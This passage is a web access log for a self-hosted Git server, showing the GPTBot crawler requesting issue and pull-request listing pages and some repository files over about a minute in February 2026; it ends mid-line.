+[17/Feb/2026:19:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11312] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:19:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:19:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:19:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" +[17/Feb/2026:19:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11224] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:19:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10142] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10143] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs?display=rendered" [Client 74.7.227.38] [Length 11208] [Gzip 3.10] [Sent-to 